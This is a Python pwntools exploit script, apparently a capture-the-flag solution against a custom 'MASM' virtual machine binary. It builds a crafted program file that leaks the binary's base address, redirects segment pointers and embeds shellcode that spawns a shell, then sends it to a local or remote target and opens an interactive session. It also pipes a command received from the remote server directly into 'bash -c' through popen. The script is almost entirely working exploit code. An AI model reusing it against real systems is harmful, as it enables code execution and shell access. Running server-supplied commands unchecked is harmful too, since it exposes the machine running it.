#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("debug")
libc = e.libc
gs = """
ida_connect
"""


def start():
    if args.LOCAL:
        p = e.process(["inp.masm"])
    elif args.GDB:
        p = gdb.debug([e.path, "inp.masm"], gdbscript=gs)
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
        data = open("inp.masm", "rb").read()
        p.sendlineafter(b"How big is your program? ", str(len(data)).encode())
        p.send(
            data
        )
    return p


rip = 4096


def set_page3_bit(page3, rip, should_be_set):
    # Apply same logic as in C:
    v2 = rip - 4089
    if rip >= 4096:
        v2 = rip - 4096
    index = v2 >> 3
    bit = rip & 7
    if not (0 <= index < len(page3)):
        print(f"Warning: v2 >> 3 = {index} out of bounds")
        return
    if should_be_set:
        page3[index] |= (1 << bit)
    else:
        page3[index] &= ~(1 << bit)


f = open("inp.masm", "wb")
f.write(b"MASM")


instructions = [
    [0, p8(0x10)+p32(6)],  # push 6
    [0, p8(0xa0)+p32(0)],  # call allocNewSegment(0)
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffef88)],  # Change data -> page2
    [1, p8(0x21)+p8(1 << 4)+p32(2)],  # syscall 2
    [1, p8(0x21)+p8(2 << 4)+p32(0xa000)],
    [1, p8(0x21)+p8(3 << 4)+p32(0x8)],
    [1, p8(1)],  # print
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffffd8)],
    [1, p8(1)],
    [1, p8(0x21)+p8(5 << 4)+p32(0x28)],
    [1, p8(0x21)+p8(1 << 4)+p32(0xffffffff)],  # syscall 1
    [1, p8(1)],  # write
    [0, p8(0x10)+p32(5)],  # call getFlag
    [0, p8(0xa0)+p32(0)],
]

segAdata = b''
segBdata = asm(shellcraft.sh())
segCdata = bytearray(0x1000)

for ins in instructions:
    segAdata += ins[1]


for expected, instr in instructions:
    set_page3_bit(segCdata, rip, expected)
    rip += len(instr)


segA = p8(1)+p16(19)+p16(len(segAdata))
segB = p8(2)+p16(19+len(segAdata))+p16(len(segBdata))
segC = p8(3)+p16(19+len(segAdata)+len(segBdata))+p16(len(segCdata))

f.write(segA+segB+segC+segAdata+segBdata+segCdata)

f.close()

p = start()

p.recvuntil(b'[I] executing program\n')
e.address = u64(p.recv(8)) - e.sym.getFlag
log.success(hex(e.address))

# p.sendline(p64(e.plt.puts))
segA_addr = u64(p.recv(8))

p.sendline(p64(segA_addr-0x1000))


p.interactive()
